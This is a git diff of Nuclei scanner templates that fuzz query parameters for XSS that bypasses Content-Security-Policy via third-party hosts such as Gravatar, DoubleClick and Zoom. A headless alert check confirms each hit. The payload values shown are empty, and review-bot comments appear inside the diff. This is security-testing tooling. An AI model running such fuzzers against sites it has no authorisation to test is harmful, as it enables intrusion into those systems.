+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,adnxs
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: secure_adnxs_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "secure_adnxs_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml
new file mode 100644
index 00000000000..471ca9e670f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: secure-gravatar-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Secure Gravatar
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gravatar
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: secure_gravatar_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "secure_gravatar_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml
new file mode 100644
index 00000000000..dc5b9781ef5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: secure-quantserve-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Secure Quantserve
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,quantserve
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: secure_quantserve_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "secure_quantserve_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml b/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml
new file mode 100644
index 00000000000..55cb72cfac3
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: securepubads-doubleclick-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Secure DoubleClick PubAds
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,doubleclick
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: securepubads_doubleclick_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "securepubads_doubleclick_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml
new file mode 100644
index 00000000000..8b0b3c98ce3
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: segapi-quantserve-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via SegAPI Quantserve
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,quantserve
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: segapi_quantserve_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "segapi_quantserve_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml b/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml
new file mode 100644
index 00000000000..c2e769b64b1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: server-ethicalads-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via EthicalAds Server
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ethicalads
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: server_ethicalads_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "server_ethicalads_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml b/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml
deleted file mode 100644
index 8263d6499f7..00000000000
--- a/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: servicenow-csp-xss
-
-info:
- name: Content-Security-Policy Bypass via ServiceNow
- author: DhiyaneshDK
- severity: high
- reference:
- - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L101C25-L101C234
- metadata:
- verified: true
- tags: xss,csp-bypass,servicenow
-
-http:
- - pre-condition:
- - type: dsl
- dsl:
- - 'method == "GET"'
-
- payloads:
- injection:
- -
-
- fuzzing:
- - part: query
- type: replace
- mode: single
- fuzz:
- - "{{injection}}"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "{{injection}}"
-
- - type: word
- part: content_type
- words:
- - "text/html"
-
- - type: word
- part: content_security_policy
- words:
- - "service-now.com"
- - "script-src"
- condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml b/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml
new file mode 100644
index 00000000000..eb8c6ae1ad1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: shop-samsung-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Samsung Shop
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,samsung
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: shop_samsung_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "shop_samsung_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml b/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml
new file mode 100644
index 00000000000..008ab5fb3d5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml
@@ -0,0 +1,57 @@
+id: skype-config-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Skype Config
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,skype
+
+#flow: http() && headless()
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: skype_config_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "skype_config_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml b/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml
new file mode 100644
index 00000000000..b8d7e8efb06
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml
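Review bot: The commented-out `#flow: http() && headless()` line between `info` and `http` is a leftover that none of the sibling templates in this series carry, and a commented key tells the reader nothing about whether the http-then-headless ordering is relied on. Either drop the two lines so skype-config matches the other new files, or, if an explicit flow is wanted, make it a live `flow: http() && headless()` key and add the same line to the siblings so the series stays consistent.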
@@ -0,0 +1,55 @@
+id: smartcaptcha-yandexcloud-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via YandexCloud SmartCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yandexcloud
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: smartcaptcha_yandexcloud_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "smartcaptcha_yandexcloud_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml
new file mode 100644
index 00000000000..5dcfe7ac37c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: social-yandex-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yandex Social
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yandex
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: social_yandex_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "social_yandex_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml
deleted file mode 100644
index 930b2ad6d13..00000000000
--- a/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: sogou-csp-xss
-
-info:
- name: Content-Security-Policy Bypass via Sogou
- author: DhiyaneshDK
- severity: high
- reference:
- - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L210C1-L210C21
- metadata:
- verified: true
- tags: xss,csp-bypass,sogou
-
-http:
- - pre-condition:
- - type: dsl
- dsl:
- - 'method == "GET"'
-
- payloads:
- injection:
- - ''
-
- fuzzing:
- - part: query
- type: replace
- mode: single
- fuzz:
- - "{{injection}}"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "{{injection}}"
-
- - type: word
- part: content_type
- words:
- - "text/html"
-
- - type: word
- part: content_security_policy
- words:
- - "sogou.com"
- - "script-src"
- condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml b/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml
new file mode 100644
index 00000000000..1ccebf63711
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: soundcloud-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via SoundCloud
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,soundcloud
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: soundcloud_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "soundcloud_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml b/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml
new file mode 100644
index 00000000000..2a16a5ae548
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: srv-carbonads-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via CarbonAds
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,carbonads
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: srv_carbonads_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "srv_carbonads_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml
new file mode 100644
index 00000000000..89cb1f2fb01
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ssl-gstatic-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Gstatic SSL
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gstatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ssl_gstatic_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ssl_gstatic_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml
new file mode 100644
index 00000000000..4f9cc6338c9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: sso-bytedance-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via ByteDance SSO
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,bytedance
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: sso_bytedance_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "sso_bytedance_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml b/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml
new file mode 100644
index 00000000000..444ee9ab8d5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: st3-zoom-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zoom ST3
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zoom
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: st3_zoom_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "st3_zoom_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml
new file mode 100644
index 00000000000..805ef3c0e34
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: stackexchange-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via StackExchange API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,stackexchange
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: stackexchange_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "stackexchange_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml b/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml
new file mode 100644
index 00000000000..8a0729fae8d
--- /dev/null
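Review bot: In st3-zoom the `injection` scalar opens with `- '` at the end of one diff line and closes with `'` at the start of the next, so as rendered here the single-quoted value spans a line break; the thehive-shopify hunk shows the same shape. If the committed file really contains that break, YAML folds it into a single space inside the payload string, which is unlikely to be the intended value; if it is only the diff rendering wrapping, nothing needs to change. Worth confirming the committed bytes of both files, since every other template in the series (including stackexchange-api on this same line) keeps the scalar as a one-line `- ''`.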
+++ b/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: static-parastorage-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Parastorage Static
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,parastorage
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: static_parastorage_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "static_parastorage_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml
new file mode 100644
index 00000000000..7f9571d8376
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: storage-googleapis-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Storage
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: storage_googleapis_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "storage_googleapis_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml b/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml
new file mode 100644
index 00000000000..32994ba3d9c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: storemapper-herokuapp-fastly-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Storemapper Herokuapp Fastly
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,storemapper
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: storemapper_herokuapp_fastly_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "storemapper_herokuapp_fastly_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml b/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml
new file mode 100644
index 00000000000..cf1e7e98928
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: suggest-taobao-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Taobao Suggest
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,taobao
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: suggest_taobao_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "suggest_taobao_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml
new file mode 100644
